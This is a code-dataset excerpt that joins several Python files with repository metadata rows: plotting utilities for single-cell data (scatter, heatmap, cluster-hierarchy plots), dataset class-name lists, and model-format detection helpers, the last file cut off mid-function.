orient="v",
s=scatter_size,
color="k",
alpha=0.4,
)
else:
sns.stripplot(
x="g",
y="v",
data=vals,
jitter=0.4,
ax=ax,
orient="v",
s=scatter_size,
color="k",
alpha=0.4,
)
ax.set_ylabel(data.columns[i], fontsize=label_size)
ax.set_xlabel("")
if n_groups == 1:
ax.set_xticks([])
ax.set_xticklabels([])
if data["groups"].nunique() == 1:
ax.set_title(
"Median: %.1f" % (int(np.median(vals["v"]))), fontsize=title_size
)
# clean_axis(ax)
ax.figure.patch.set_alpha(0)
ax.patch.set_alpha(0)
fig.suptitle(sup_title, fontsize=sup_title_size)
plt.tight_layout()
if show_fig:
plt.show()
else:
return fig
def plot_mean_var(
nzm: np.ndarray,
fv: np.ndarray,
n_cells: np.ndarray,
hvg: np.ndarray,
ax_label_fs: float = 12,
fig_size: Tuple[float, float] = (4.5, 4.0),
ss: Tuple[float, float] = (3, 30),
cmaps: Tuple[str, str] = ("winter", "magma_r"),
):
"""
Shows a mean-variance plot.
"""
_, ax = plt.subplots(1, 1, figsize=fig_size)
nzm = np.log2(nzm)
fv = np.log2(fv)
ax.scatter(nzm[~hvg], fv[~hvg], alpha=0.6, c=n_cells[~hvg], cmap=cmaps[0], s=ss[0])
ax.scatter(
nzm[hvg],
fv[hvg],
alpha=0.8,
c=n_cells[hvg],
cmap=cmaps[1],
s=ss[1],
edgecolor="k",
lw=0.5,
)
ax.set_xlabel("Log mean non-zero expression", fontsize=ax_label_fs)
ax.set_ylabel("Log corrected variance", fontsize=ax_label_fs)
clean_axis(ax)
plt.tight_layout()
plt.show()
def plot_elbow(var_exp, figsize: Tuple[float, float] = (None, 2)):
from kneed import KneeLocator
x = range(len(var_exp))
kneedle = KneeLocator(x, var_exp, S=1.0, curve="convex", direction="decreasing")
if figsize[0] is None:
figsize = (0.25 * len(var_exp), figsize[1])
fig, ax = plt.subplots(1, 1, figsize=figsize)
ax.plot(x, var_exp, lw=1)
ax.set_xticks(x)
ax.axvline(kneedle.elbow, lw=1, c="r", label="Elbow")
ax.set_ylabel("% Variance explained", fontsize=9)
ax.set_xlabel("Principal components", fontsize=9)
clean_axis(ax, ts=8)
ax.legend(frameon=False, fontsize=9)
plt.tight_layout()
plt.show()
def plot_heatmap(
cdf,
fontsize: float = 10,
width_factor: float = 0.03,
height_factor: float = 0.02,
cmap=cm.matter_r,
savename: str = None,
save_dpi: int = 300,
figsize=None,
show_fig: bool = True,
):
"""
Shows a heatmap plot.
"""
if figsize is None:
figsize = (
cdf.shape[1] * fontsize * width_factor,
fontsize * cdf.shape[0] * height_factor,
)
cgx = sns.clustermap(
cdf,
yticklabels=cdf.index,
xticklabels=cdf.columns,
method="ward",
figsize=figsize,
cmap=cmap,
rasterized=True,
)
cgx.ax_heatmap.set_yticklabels(
cdf.index[cgx.dendrogram_row.reordered_ind], fontsize=fontsize
)
cgx.ax_heatmap.set_xticklabels(
cdf.columns[cgx.dendrogram_col.reordered_ind], fontsize=fontsize
)
cgx.ax_heatmap.figure.patch.set_alpha(0)
cgx.ax_heatmap.patch.set_alpha(0)
if savename:
plt.savefig(savename, dpi=save_dpi)
if show_fig:
plt.show()
else:
return cgx
def _scatter_fix_type(v: pd.Series, ints_as_cats: bool) -> pd.Series:
vt = v.dtype
if v.nunique() == 1:
return pd.Series(np.ones(len(v)), index=v.index).astype(np.float_)
if vt in [np.bool_]:
# converting first to int to handle bool
return v.astype(np.int_).astype("category")
if vt in [str, object] or vt.name == "category":
return v.astype("category")
elif np.issubdtype(vt.type, np.integer) and ints_as_cats:
if v.nunique() > 100:
            logger.warning("Too many categories. Set `force_ints_as_cats` to False.")
return v.astype(np.int_).astype("category")
else:
return v.astype(np.float_)
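# Hedged illustration of _scatter_fix_type (the example function is not part of Scarf):
# boolean/string columns become categoricals, integer columns become categoricals only
# when ints_as_cats is True, and float columns stay continuous.
def _example_scatter_fix_type():
    s = pd.Series([1, 2, 2, 3])
    as_cat = _scatter_fix_type(s, ints_as_cats=True)                # 'category'
    as_num = _scatter_fix_type(s.astype(float), ints_as_cats=True)  # 'float64'
    return as_cat.dtype.name, as_num.dtype.name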
def _scatter_fix_mask(v: pd.Series, mask_vals: list, mask_name: str) -> pd.Series:
if mask_vals is None:
mask_vals = []
mask_vals += [np.NaN]
iscat = False
if v.dtype.name == "category":
iscat = True
v = v.astype(object)
# There is a bug in pandas which causes failure above 1M rows
# v[v.isin(mask_vals)] = mask_name
v[np.isin(v, mask_vals)] = mask_name
if iscat:
v = v.astype("category")
return v
def _scatter_make_colors(
v: pd.Series, cmap, color_key: Optional[dict], mask_color: str, mask_name: str
):
from matplotlib.cm import get_cmap
na_idx = v == mask_name
uv = v[~na_idx].unique()
if v.dtype.name != "category":
if cmap is None:
return cm.deep, None
else:
return get_cmap(cmap), None
else:
if cmap is None:
cmap = "custom"
if color_key is not None:
for i in uv:
if i not in color_key:
raise KeyError(f"ERROR: key {i} missing in `color_key`")
if na_idx.sum() > 0:
if mask_name not in color_key:
color_key[mask_name] = mpl.colors.to_hex(mask_color)
return None, color_key
else:
if cmap == "custom":
if len(uv) <= 10:
pal = custom_palettes[10]
elif len(uv) <= 20:
pal = custom_palettes[20]
elif len(uv) <= 30:
pal = custom_palettes[28]
else:
pal = custom_palettes[102]
else:
pal = sns.color_palette(cmap, n_colors=len(uv)).as_hex()
color_key = dict(zip(sorted(uv), pal))
if na_idx.sum() > 0:
color_key[mask_name] = mpl.colors.to_hex(mask_color)
return None, color_key
def _scatter_cleanup(ax, sw: float, sc: str, ds: tuple) -> None:
for i in ["bottom", "left", "top", "right"]:
spine = ax.spines[i]
if i in ds:
spine.set_visible(True)
spine.set_linewidth(sw)
spine.set_edgecolor(sc)
else:
spine.set_visible(False)
ax.figure.patch.set_alpha(0)
ax.patch.set_alpha(0)
ax.set_aspect("auto")
return None
def _scatter_label_axis(df, ax, fs: float, fo: float):
x, y = df.columns[:2]
ax.set_xlabel(x, fontsize=fs)
ax.set_ylabel(y, fontsize=fs)
vmin, vmax = df[x].min(), df[x].max()
ax.set_xlim((vmin - abs(vmin * fo), vmax + abs(vmax * fo)))
vmin, vmax = df[y].min(), df[y].max()
ax.set_ylim((vmin - abs(vmin * fo), vmax + abs(vmax * fo)))
ax.set_xticks([])
ax.set_yticks([])
return None
def _scatter_legends(
df,
ax,
cmap,
ck,
ondata: bool,
onside: bool,
fontsize: float,
n_per_col: int,
scale: float,
ls: float,
cs: float,
cbs: float,
) -> None:
"""
Args:
df: dataframe
ax: axis object
cmap: color map
ck: color key
ondata: display legend over scatter plot?
onside: display legend on side?
fontsize: fontsize of legend text
n_per_col: number of legends per column
scale: scale legend marker size
ls: line spacing
cs: column spacing
cbs: Cbar shrink factor
Returns:
"""
from matplotlib.colors import Normalize
from matplotlib.colorbar import ColorbarBase, make_axes_gridspec
x, y, vc = df.columns[:3]
v = df[vc]
cax = make_axes_gridspec(ax, location="top", shrink=cbs, aspect=25, fraction=0.1)[0]
if v.nunique() <= 1:
cax.set_axis_off()
return None
if v.dtype.name == "category":
ax.title.set_text(vc)
centers = df[[x, y, vc]].groupby(vc).median().T
for i in centers:
if ondata:
ax.text(
centers[i][x],
centers[i][y],
i,
fontsize=fontsize,
ha="center",
va="center",
)
if onside:
ax.scatter(
[float(centers[i][x])],
[float(centers[i][y])],
c=ck[i],
label=i,
alpha=1,
s=0.01,
)
if onside:
n_cols = v.nunique() // n_per_col
if v.nunique() % n_per_col > 0:
n_cols += 1
ax.legend(
ncol=n_cols,
loc=(1, 0),
frameon=False,
fontsize=fontsize,
markerscale=scale,
labelspacing=ls,
columnspacing=cs,
)
cax.set_axis_off()
else:
norm = Normalize(vmin=v.min(), vmax=v.max())
cb = ColorbarBase(cax, cmap=cmap, norm=norm, orientation="horizontal")
cb.set_label(vc, fontsize=fontsize)
cb.ax.xaxis.set_label_position("bottom")
cb.ax.xaxis.set_ticks_position("top")
cb.outline.set_visible(False)
return None
def _make_grid(width, height, w_pad, h_pad, n_panels, n_columns):
n_columns = np.minimum(n_panels, n_columns)
n_rows = np.ceil(n_panels / n_columns).astype(int)
if w_pad is None and h_pad is None:
constrained = True
else:
constrained = False
fig, axes = plt.subplots(
n_rows,
n_columns,
figsize=(width * n_columns, height * n_rows),
squeeze=False,
constrained_layout=constrained,
)
diff = (n_rows * n_columns) - n_panels
while diff > 0:
fig.delaxes(axes[n_rows - 1, n_columns - diff])
diff -= 1
if not constrained:
plt.tight_layout(w_pad=w_pad, h_pad=h_pad)
return fig, axes
def _create_axes(dfs, in_ax, width, height, w_pad, h_pad, n_columns):
if len(dfs) > 1:
if in_ax is not None:
            logger.warning(
                "'in_ax' will not be used because multiple attributes will be plotted. "
                "Using internal grid layout."
            )
_, axs = _make_grid(width, height, w_pad, h_pad, len(dfs), n_columns)
else:
if in_ax is None:
_, axs = plt.subplots(1, 1, figsize=(width, height), squeeze=False)
else:
axs = in_ax
return axs
def _iter_dataframes(dfs, mask_values, mask_name, force_ints_as_cats):
for n, df in enumerate(dfs):
vc = df.columns[2]
v = _scatter_fix_mask(df[vc].copy(), mask_values, mask_name)
df[vc] = _scatter_fix_type(v, force_ints_as_cats)
yield n, df
def plot_scatter(
dfs,
in_ax=None,
width: float = 6,
height: float = 6,
default_color: str = "steelblue",
color_map=None,
color_key: dict = None,
mask_values: list = None,
mask_name: str = "NA",
mask_color: str = "k",
point_size: float = 10,
ax_label_size: float = 12,
frame_offset: float = 0.05,
spine_width: float = 0.5,
spine_color: str = "k",
displayed_sides: tuple = ("bottom", "left"),
legend_ondata: bool = True,
legend_onside: bool = True,
legend_size: float = 12,
legends_per_col: int = 20,
cbar_shrink: float = 0.6,
marker_scale: float = 70,
lspacing: float = 0.1,
cspacing: float = 1,
savename: str = None,
dpi: int = 300,
force_ints_as_cats: bool = True,
n_columns: int = 4,
w_pad: float = 1,
h_pad: float = 1,
show_fig: bool = True,
scatter_kwargs: dict = None,
):
"""
    Shows scatter plots. If more than one dataframe is provided, the scatter plots are placed in a grid.
"""
from matplotlib.colors import to_hex
def _handle_scatter_kwargs(sk):
if sk is None:
sk = {}
if "c" in sk:
logger.warning("scatter_kwarg value `c` will be ignored")
del sk["c"]
if "s" in sk:
logger.warning("scatter_kwarg value `s` will be ignored")
del sk["s"]
if "lw" not in sk:
sk["lw"] = 0.1
if "edgecolors" not in sk:
sk["edgecolors"] = "k"
return sk
axs = _create_axes(dfs, in_ax, width, height, w_pad, h_pad, n_columns)
for n, df in _iter_dataframes(dfs, mask_values, mask_name, force_ints_as_cats):
v = df[df.columns[2]]
col_map, col_key = _scatter_make_colors(
v, color_map, color_key, mask_color, mask_name
)
if v.dtype.name == "category":
df["c"] = [col_key[x] for x in v]
else:
if v.nunique() == 1:
df["c"] = [default_color for _ in v]
else:
v = v.copy().fillna(0)
mmv = (v - v.min()) / (v.max() - v.min())
df["c"] = [to_hex(col_map(x)) for x in mmv]
if "s" not in df:
df["s"] = [point_size for _ in df.index]
scatter_kwargs = _handle_scatter_kwargs(sk=scatter_kwargs)
ax = axs[int(n / n_columns), n % n_columns]
ax.scatter(
df.values[:, 0],
df.values[:, 1],
c=df["c"].values,
s=df["s"].values,
rasterized=True,
**scatter_kwargs,
)
_scatter_label_axis(df, ax, ax_label_size, frame_offset)
_scatter_cleanup(ax, spine_width, spine_color, displayed_sides)
_scatter_legends(
df,
ax,
col_map,
col_key,
legend_ondata,
legend_onside,
legend_size,
legends_per_col,
marker_scale,
lspacing,
cspacing,
cbar_shrink,
)
if savename:
plt.savefig(savename, dpi=dpi, bbox_inches="tight")
if show_fig:
plt.show()
else:
return axs
def shade_scatter(
dfs,
in_ax=None,
figsize: float = 6,
pixels: int = 1000,
spread_px: int = 1,
spread_threshold: float = 0.2,
min_alpha: int = 10,
color_map=None,
color_key: dict = None,
mask_values: list = None,
mask_name: str = "NA",
mask_color: str = "k",
ax_label_size: float = 12,
frame_offset: float = 0.05,
spine_width: float = 0.5,
spine_color: str = "k",
displayed_sides: tuple = ("bottom", "left"),
legend_ondata: bool = True,
legend_onside: bool = True,
legend_size: float = 12,
legends_per_col: int = 20,
cbar_shrink: float = 0.6,
marker_scale: float = 70,
lspacing: float = 0.1,
cspacing: float = 1,
savename: str = None,
dpi: int = 300,
force_ints_as_cats: bool = True,
n_columns: int = 4,
w_pad: float = None,
h_pad: float = None,
show_fig: bool = True,
):
"""
    Shows shaded scatter plots. If more than one dataframe is provided, the scatter plots are placed in a grid.
"""
import datashader as dsh
from datashader.mpl_ext import dsshow
import datashader.transfer_functions as tf
from functools import partial
axs = _create_axes(dfs, in_ax, figsize, figsize, w_pad, h_pad, n_columns)
for n, df in _iter_dataframes(dfs, mask_values, mask_name, force_ints_as_cats):
dim1, dim2, vc = df.columns[:3]
v = df[vc]
col_map, col_key = _scatter_make_colors(
v, color_map, color_key, mask_color, mask_name
)
if v.dtype.name == "category":
agg = dsh.count_cat(vc)
else:
if v.nunique() == 1:
agg = dsh.count(vc)
else:
agg = dsh.mean(vc)
ax = axs[int(n / n_columns), n % n_columns]
artist = dsshow(
df,
dsh.Point(dim1, dim2),
aggregator=agg,
norm="eq_hist",
color_key=col_key,
cmap=col_map,
alpha_range=(min_alpha, 255),
shade_hook=partial(
tf.dynspread, threshold=spread_threshold, max_px=spread_px
),
plot_height=pixels,
plot_width=pixels,
aspect="equal",
width_scale=1,
height_scale=1,
ax=ax,
)
_scatter_label_axis(df, ax, ax_label_size, frame_offset)
_scatter_cleanup(ax, spine_width, spine_color, displayed_sides)
_scatter_legends(
df,
ax,
col_map,
col_key,
legend_ondata,
legend_onside,
legend_size,
legends_per_col,
marker_scale,
lspacing,
cspacing,
cbar_shrink,
)
if savename:
plt.savefig(savename, dpi=dpi, bbox_inches="tight")
if show_fig:
plt.show()
else:
return axs
def _draw_pie(ax, dist, colors, xpos, ypos, size):
# https://stackoverflow.com/questions/56337732/how-to-plot-scatter-pie-chart-using-matplotlib
cumsum = np.cumsum(dist)
cumsum = cumsum / cumsum[-1]
pie = [0] + cumsum.tolist()
for r1, r2, c in zip(pie[:-1], pie[1:], colors):
angles = np.linspace(2 * np.pi * r1, 2 * np.pi * r2)
x = [0] + np.cos(angles).tolist()
y = [0] + np.sin(angles).tolist()
xy = np.column_stack([x, y])
ax.scatter([xpos], [ypos], marker=xy, s=size, c=c)
def hierarchy_pos(
g, root=None, width=1.0, vert_gap=0.2, vert_loc=0, leaf_vs_root_factor=0.5
):
"""
This function was lifted from here:
https://github.com/springer-math/Mathematics-of-Epidemics-on-Networks/blob/80c8accbe0c6b7710c0a189df17529696ac31bf9/EoN/auxiliary.py
    If the graph is a tree, this will return the positions to plot it in a
    hierarchical layout.
Based on Joel's answer at https://stackoverflow.com/a/29597209/2966723,
but with some modifications.
We include this because it may be useful for plotting transmission trees,
and there is currently no networkx equivalent (though it may be coming soon).
There are two basic approaches we think of to allocate the horizontal
location of a node.
- Top down: we allocate horizontal space to a node. Then its ``k``
descendants split up that horizontal space equally. This tends to result
in overlapping nodes when some have many descendants.
- Bottom up: we allocate horizontal space to each leaf node. A node at a
higher level gets the entire space allocated to its descendant leaves.
Based on this, leaf nodes at higher levels get the same space as leaf
nodes very deep in the tree.
    We use both of these approaches simultaneously, with ``leaf_vs_root_factor``
    determining how much of the horizontal space is based on the bottom-up or
    top-down approach. ``0`` gives pure bottom-up, while ``1`` gives pure top-down.
Args:
g: the graph (must be a tree)
root: the root node of the tree
- if the tree is directed and this is not given, the root will be found and used
- if the tree is directed and this is given, then the positions will be just for the descendants of
this node.
- if the tree is undirected and not given, then a random choice will be used.
width: horizontal space allocated for this branch - avoids overlap with other branches
vert_gap: gap between levels of hierarchy
vert_loc: vertical location of root
        leaf_vs_root_factor: fraction of the horizontal allocation taken from the
            bottom-up (leaf-based) layout rather than the top-down (root-based) layout
            (the horizontal location of the root is computed internally as width / 2)
"""
import networkx as nx
if not nx.is_tree(g):
raise TypeError("cannot use hierarchy_pos on a graph that is not a tree")
if root is None:
if isinstance(g, nx.DiGraph):
root = next(
iter(nx.topological_sort(g))
) # allows back compatibility with nx version 1.11
else:
root = np.random.choice(list(g.nodes))
def _hierarchy_pos(
g,
root,
leftmost,
width,
leafdx=0.2,
vert_gap=0.2,
vert_loc=0,
xcenter=0.5,
rootpos=None,
leafpos=None,
parent=None,
):
"""
see hierarchy_pos docstring for most arguments
pos: a dict saying where all nodes go if they have been assigned
parent: parent of this branch. - only affects it if non-directed
"""
if rootpos is None:
rootpos = {root: (xcenter, vert_loc)}
else:
rootpos[root] = (xcenter, vert_loc)
if leafpos is None:
leafpos = {}
children = list(g.neighbors(root))
leaf_count = 0
if not isinstance(g, nx.DiGraph) and parent is not None:
children.remove(parent)
if len(children) != 0:
rootdx = width / len(children)
nextx = xcenter - width / 2 - rootdx / 2
for child in children:
nextx += rootdx
rootpos, leafpos, newleaves = _hierarchy_pos(
g,
child,
leftmost + leaf_count * leafdx,
width=rootdx,
leafdx=leafdx,
vert_gap=vert_gap,
vert_loc=vert_loc - vert_gap,
xcenter=nextx,
rootpos=rootpos,
leafpos=leafpos,
parent=root,
)
leaf_count += newleaves
leftmostchild = min((x for x, y in [leafpos[child] for child in children]))
rightmostchild = max((x for x, y in [leafpos[child] for child in children]))
leafpos[root] = ((leftmostchild + rightmostchild) / 2, vert_loc)
else:
leaf_count = 1
leafpos[root] = (leftmost, vert_loc)
# pos[root] = (leftmost + (leaf_count-1)*dx/2., vert_loc)
# print(leaf_count)
return rootpos, leafpos, leaf_count
xcenter = width / 2.0
if isinstance(g, nx.DiGraph):
leafcount = len(
[node for node in nx.descendants(g, root) if g.out_degree(node) == 0]
)
elif isinstance(g, nx.Graph):
leafcount = len(
[
node
for node in nx.node_connected_component(g, root)
if g.degree(node) == 1 and node != root
]
)
rootpos, leafpos, leaf_count = _hierarchy_pos(
g,
root,
0,
width,
leafdx=width * 1.0 / leafcount,
vert_gap=vert_gap,
vert_loc=vert_loc,
xcenter=xcenter,
)
pos = {}
for node in rootpos:
pos[node] = (
leaf_vs_root_factor * leafpos[node][0]
+ (1 - leaf_vs_root_factor) * rootpos[node][0],
leafpos[node][1],
)
xmax = max(x for x, y in pos.values())
for node in pos:
pos[node] = (pos[node][0] * width / xmax, pos[node][1])
return pos
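# A hedged usage sketch for hierarchy_pos (the example function and the balanced tree
# are illustrative only; networkx is assumed to be installed): compute the hierarchical
# positions for a small tree and draw the tree with them.
def _example_hierarchy_pos():
    import networkx as nx
    g = nx.balanced_tree(r=2, h=3)  # binary tree of depth 3
    pos = hierarchy_pos(g, root=0, width=1.0, vert_gap=0.2, leaf_vs_root_factor=0.5)
    nx.draw(g, pos=pos, node_size=50)
    plt.show()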
def plot_cluster_hierarchy(
sg,
clusts,
color_values=None,
force_ints_as_cats: bool = True,
width: float = 2,
lvr_factor: float = 0.5,
vert_gap: float = 0.2,
min_node_size: float = 10,
node_size_multiplier: float = 1e4,
node_power: float = 1,
root_size: float = 100,
non_leaf_size: float = 10,
show_labels: bool = False,
fontsize=10,
root_color: str = "#C0C0C0",
non_leaf_color: str = "k",
cmap: str = None,
color_key: bool = None,
edgecolors: str = "k",
edgewidth: float = 1,
alpha: float = 0.7,
figsize=(5, 5),
ax=None,
show_fig: bool = True,
savename: str = None,
save_dpi=300,
):
"""
    Plots the cluster hierarchy.
    Returns:
        If `show_fig` is False, the matplotlib Axes object containing the plot
        (the modified `ax` parameter if one was given).
"""
import networkx as nx
import math
from matplotlib.colors import to_hex
if color_values is None:
color_values = pd.Series(clusts)
using_clust_for_colors = True
else:
color_values = pd.Series(color_values)
using_clust_for_colors = False
color_values = _scatter_fix_type(color_values, force_ints_as_cats)
cmap, color_key = _scatter_make_colors(
color_values, cmap, color_key, "k", "longdummyvaluesofh3489hfpiqehdcbla"
)
pos = hierarchy_pos(
sg, width=width * math.pi, leaf_vs_root_factor=lvr_factor, vert_gap=vert_gap
)
new_pos = {
u: (r * math.cos(theta), r * math.sin(theta)) for u, (theta, r) in pos.items()
}
if color_key is None:
cluster_values = (
pd.DataFrame({"clusters": clusts, "v": color_values})
.groupby("clusters")
.mean()["v"]
)
mmv: pd.Series = (cluster_values - cluster_values.min()) / (
cluster_values.max() - cluster_values.min()
)
color_key = {k: to_hex(cmap(v)) for k, v in mmv.to_dict().items()}
else:
cluster_values = None
cs = pd.Series(clusts).value_counts()
cs = (node_size_multiplier * ((cs / cs.sum()) ** node_power)).to_dict()
nc, ns = [], []
for i in sg.nodes():
if "partition_id" in sg.nodes[i]:
clust_id = sg.nodes[i]["partition_id"]
if cluster_values is not None or using_clust_for_colors:
nc.append(color_key[clust_id])
ns.append(max(cs[clust_id], min_node_size))
else:
nc.append("white")
ns.append(0)
else:
if sg.nodes[i]["nleaves"] == len(clusts):
nc.append(root_color)
ns.append(root_size)
else:
nc.append(non_leaf_color)
ns.append(non_leaf_size)
if ax is None:
fig, ax = plt.subplots(1, 1, figsize=figsize)
nx.draw(
sg,
pos=new_pos,
node_size=ns,
node_color=nc,
ax=ax,
edgecolors=edgecolors,
alpha=alpha,
linewidths=edgewidth,
)
if cluster_values is None and using_clust_for_colors is False:
for i in sg.nodes():
if "partition_id" in sg.nodes[i]:
clust_id = sg.nodes[i]["partition_id"]
idx = clusts == clust_id
counts = color_values[idx].value_counts()
_draw_pie(
ax,
counts.values,
[color_key[x] for x in counts.index],
new_pos[i][0],
new_pos[i][1],
max(cs[clust_id], min_node_size),
)
if show_labels:
for i in sg.nodes():
if "partition_id" in sg.nodes[i]:
clust_id = sg.nodes[i]["partition_id"]
ax.text(
new_pos[i][0],
new_pos[i][1],
clust_id,
fontsize=fontsize,
ha="center",
va="center",
)
if savename:
plt.savefig(savename, dpi=save_dpi)
if show_fig:
plt.show()
else:
return ax
| 28.916737
| 136
| 0.531092
|
7703e48fc7b865d657387900c3b02c2d98f773c3
| 4,319
|
py
|
Python
|
paz/datasets/utils.py
|
DeepanChakravarthiPadmanabhan/paz_coco
|
ebbf178491f1771e873425a9b1507b0374325c48
|
[
"MIT"
] | 300
|
2020-10-29T08:02:05.000Z
|
2022-03-30T21:47:32.000Z
|
paz/datasets/utils.py
|
albertofernandezvillan/paz
|
9fbd50b993f37e1e807297a29c6044c09967c9cc
|
[
"MIT"
] | 30
|
2020-10-29T12:40:32.000Z
|
2022-03-31T14:06:35.000Z
|
paz/datasets/utils.py
|
albertofernandezvillan/paz
|
9fbd50b993f37e1e807297a29c6044c09967c9cc
|
[
"MIT"
] | 62
|
2020-10-29T12:34:13.000Z
|
2022-03-29T05:21:45.000Z
|
def get_class_names(dataset_name='VOC2007'):
"""Gets label names for the classes of the supported datasets.
# Arguments
dataset_name: String. Dataset name. Valid dataset names are:
VOC2007, VOC2012, COCO and YCBVideo.
# Returns
List of strings containing the class names for the dataset given.
# Raises
ValueError: in case of invalid dataset name
"""
if dataset_name in ['VOC2007', 'VOC2012', 'VOC']:
class_names = ['background', 'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair', 'cow',
'diningtable', 'dog', 'horse', 'motorbike', 'person',
'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
elif dataset_name == 'COCO':
class_names = ['background', 'person', 'bicycle', 'car', 'motorcycle',
'airplane', 'bus', 'train', 'truck', 'boat',
'traffic light', 'fire hydrant', 'stop sign',
'parking meter', 'bench', 'bird', 'cat', 'dog',
'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella',
'handbag', 'tie', 'suitcase', 'frisbee', 'skis',
'snowboard', 'sports ball', 'kite', 'baseball bat',
'baseball glove', 'skateboard', 'surfboard',
'tennis racket', 'bottle', 'wine glass',
'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana',
'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
'potted plant', 'bed', 'dining table', 'toilet',
'tv', 'laptop', 'mouse', 'remote', 'keyboard',
'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase',
'scissors', 'teddy bear', 'hair drier', 'toothbrush']
elif dataset_name == 'YCBVideo':
class_names = ['background', '037_scissors', '008_pudding_box',
'024_bowl', '005_tomato_soup_can', '007_tuna_fish_can',
'010_potted_meat_can', '061_foam_brick', '011_banana',
'035_power_drill', '004_sugar_box', '019_pitcher_base',
'006_mustard_bottle', '036_wood_block',
'009_gelatin_box', '051_large_clamp',
'040_large_marker', '003_cracker_box',
'025_mug', '052_extra_large_clamp',
'021_bleach_cleanser', '002_master_chef_can']
elif dataset_name == 'FAT':
class_names = ['background', '037_scissors', '008_pudding_box',
'024_bowl', '005_tomato_soup_can', '007_tuna_fish_can',
'010_potted_meat_can', '061_foam_brick', '011_banana',
'035_power_drill', '004_sugar_box', '019_pitcher_base',
'006_mustard_bottle', '036_wood_block',
'009_gelatin_box', '051_large_clamp',
'040_large_marker', '003_cracker_box',
'025_mug', '052_extra_large_clamp',
'021_bleach_cleanser', '002_master_chef_can']
elif dataset_name == 'FERPlus':
return ['neutral', 'happiness', 'surprise', 'sadness',
'anger', 'disgust', 'fear', 'contempt']
elif dataset_name == 'FER':
return ['angry', 'disgust', 'fear', 'happy',
'sad', 'surprise', 'neutral']
elif dataset_name == 'IMDB':
return ['man', 'woman']
elif dataset_name == 'CityScapes':
return ['void', 'flat', 'construction',
'object', 'nature', 'sky', 'human', 'vehicle']
else:
raise ValueError('Invalid dataset', dataset_name)
return class_names
def get_arg_to_class(class_names):
"""Constructs dictionary from argument to class names.
# Arguments
class_names: List of strings containing the class names.
# Returns
Dictionary mapping integer to class name.
"""
return dict(zip(list(range(len(class_names))), class_names))
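# A small usage sketch (not part of the original module): build the index-to-name
# mapping for the COCO label set defined above.
if __name__ == '__main__':
    coco_names = get_class_names('COCO')
    arg_to_class = get_arg_to_class(coco_names)
    print(arg_to_class[0], arg_to_class[1])  # background person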
| 44.989583
| 78
| 0.526279
|
92c19efd530f04175195738b85f74b77b33c249b
| 6,367
|
py
|
Python
|
python/arachne/utils/model_utils.py
|
fixstars/arachne
|
03c00fc5105991d0d706b935d77e6f9255bae9e7
|
[
"MIT"
] | 3
|
2022-03-29T03:02:20.000Z
|
2022-03-29T03:48:38.000Z
|
python/arachne/utils/model_utils.py
|
fixstars/arachne
|
03c00fc5105991d0d706b935d77e6f9255bae9e7
|
[
"MIT"
] | null | null | null |
python/arachne/utils/model_utils.py
|
fixstars/arachne
|
03c00fc5105991d0d706b935d77e6f9255bae9e7
|
[
"MIT"
] | 1
|
2022-03-29T05:44:12.000Z
|
2022-03-29T05:44:12.000Z
|
import dataclasses
import os
import tarfile
import tempfile
from dataclasses import asdict
from typing import Optional
import onnx
import onnxruntime
import tensorflow as tf
import torch
import tvm
import yaml
from omegaconf import DictConfig, OmegaConf
from ..data import Model, ModelFormat, ModelSpec, TensorSpec
from .onnx_utils import get_onnx_model_spec
from .tf_utils import get_keras_model_spec, get_saved_model_spec, get_tflite_model_spec
from .version_utils import (
get_cuda_version,
get_cudnn_version,
get_tensorrt_version,
get_torch2trt_version,
)
def init_from_file(model_file: str) -> Model:
"""The function to initialize arachne.data.Model from a model file
Args:
model_file (str): path to a model file
Returns:
Model: a model instance
"""
format: ModelFormat
spec: Optional[ModelSpec]
if model_file.endswith(".tflite"):
format = ModelFormat.TFLITE
spec = get_tflite_model_spec(model_file)
elif model_file.endswith(".h5"):
format = ModelFormat.KERAS_H5
spec = get_keras_model_spec(model_file)
elif model_file.endswith(".onnx"):
format = ModelFormat.ONNX
spec = get_onnx_model_spec(model_file)
elif model_file.endswith(".pb"):
format = ModelFormat.TF_PB
spec = None
elif model_file.endswith(".pth") or model_file.endswith(".pt"):
format = ModelFormat.PYTORCH
spec = None
else:
raise RuntimeError("Fail to detect a model format for " + model_file)
return Model(path=model_file, format=format, spec=spec)
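# Hedged usage sketch (the file path and the helper function are hypothetical, not part
# of arachne): detect the format of an ONNX model file and inspect its tensor spec.
def _example_init_from_file():
    model = init_from_file("model.onnx")  # hypothetical path
    assert model.format == ModelFormat.ONNX
    if model.spec is not None:
        return [t.name for t in model.spec.inputs]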
def __is_saved_model_dir(model_dir: str):
found_pb = False
found_assets = False
found_variables = False
for f in os.listdir(model_dir):
if f.endswith(".pb"):
found_pb = True
if f == "assets":
found_assets = True
if f == "variables":
found_variables = True
return found_pb & found_assets & found_variables
def __is_openvino_model_dir(model_dir: str):
found_bin = False
found_xml = False
found_mapping = False
for f in os.listdir(model_dir):
if f.endswith(".bin"):
found_bin = True
if f.endswith(".xml"):
found_xml = True
if f.endswith(".mapping"):
found_mapping = True
return found_bin & found_xml & found_mapping
def __is_caffe_model_dir(model_dir: str):
found_caffemodel = False
found_prototxt = False
for f in os.listdir(model_dir):
if f.endswith(".caffemodel"):
found_caffemodel = True
if f.endswith(".prototxt"):
found_prototxt = True
return found_caffemodel & found_prototxt
def init_from_dir(model_dir: str) -> Model:
"""The function to initialize arachne.data.Model from a model directory
Args:
model_dir (str): path to a model directory
Returns:
Model: a model instance
"""
format: ModelFormat
spec: Optional[ModelSpec]
if __is_saved_model_dir(model_dir):
format = ModelFormat.TF_SAVED_MODEL
spec = get_saved_model_spec(model_dir)
elif __is_openvino_model_dir(model_dir):
format = ModelFormat.OPENVINO
spec = None
elif __is_caffe_model_dir(model_dir):
format = ModelFormat.CAFFE
spec = None
else:
raise RuntimeError("Fail to detect a model format for " + model_dir)
return Model(path=model_dir, format=format, spec=spec)
def load_model_spec(spec_file_path: str) -> ModelSpec:
"""The function to load the model specification from a YAML file
Args:
spec_file_path (str): path to a YAML file that describes the model specification
Returns:
ModelSpec: the tensor information of the model or None
"""
tmp = OmegaConf.load(spec_file_path)
tmp = OmegaConf.to_container(tmp)
